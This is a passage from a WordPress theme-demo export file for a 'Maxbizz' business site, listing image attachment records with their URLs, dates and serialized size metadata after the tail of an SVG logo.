c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>post</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/entering-the-next-phase-of-digital-transformation/post/</link>
		<pubDate>Fri, 04 Sep 2020 07:21:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/post.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>417</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 07:21:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 07:21:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[post]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>413</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/post.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/post.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:350;s:4:"file";s:18:"2020/09/post.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:18:"post-1-300x121.jpg";s:5:"width";i:300;s:6:"height";i:121;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:18:"post-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"post-1-768x309.jpg";s:5:"width";i:768;s:6:"height";i:309;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:18:"post-1-600x350.jpg";s:5:"width";i:600;s:6:"height";i:350;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:18:"post-1-600x350.jpg";s:5:"width";i:600;s:6:"height";i:350;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg-video</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/the-future-of-retail-asias-ecosystems/bg-video/</link>
		<pubDate>Fri, 04 Sep 2020 09:00:07 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg-video.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>432</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:00:07]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:00:07]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg-video]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>430</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg-video.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg-video.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:22:"2020/09/bg-video.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:22:"bg-video-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"bg-video-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"bg-video-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"bg-video-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"bg-video-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/how-to-write-a-successful-grant-application/gallery-1/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>438</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:23:"2020/09/gallery-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"gallery-1-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"gallery-1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"gallery-1-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-1-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/how-to-write-a-successful-grant-application/gallery-2/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>439</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:23:"2020/09/gallery-2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"gallery-2-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"gallery-2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"gallery-2-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-2-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/how-to-write-a-successful-grant-application/gallery-3/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>440</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:23:"2020/09/gallery-3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"gallery-3-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"gallery-3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"gallery-3-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-3-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>blog-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/contactless-payments-time-has-come/blog-1/</link>
		<pubDate>Fri, 04 Sep 2020 09:09:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/blog-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>448</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:09:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:09:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>447</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/blog-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/blog-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:20:"2020/09/blog-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:20:"blog-1-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:20:"blog-1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"blog-1-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:20:"blog-1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:20:"blog-1-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>author-widget</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/author-widget/</link>
		<pubDate>Fri, 04 Sep 2020 09:10:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/author-widget.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>451</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:10:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:10:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[author-widget]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/author-widget.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/author-widget.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:150;s:6:"height";i:150;s:4:"file";s:27:"2020/09/author-widget.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image-contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/contacts/image-contacts/</link>
		<pubDate>Fri, 04 Sep 2020 10:51:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image-contacts.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>465</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 10:51:41]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 10:51:41]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image-contacts]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>455</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image-contacts.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image-contacts.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:849;s:6:"height";i:878;s:4:"file";s:28:"2020/09/image-contacts.png";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:28:"image-contacts-1-290x300.png";s:5:"width";i:290;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"image-contacts-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:12:"medium_large";a:4:{s:4:"file";s:28:"image-contacts-1-768x794.png";s:5:"width";i:768;s:6:"height";i:794;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"image-contacts-1-600x400.png";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"image-contacts-1-600x600.png";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:28:"image-contacts-1-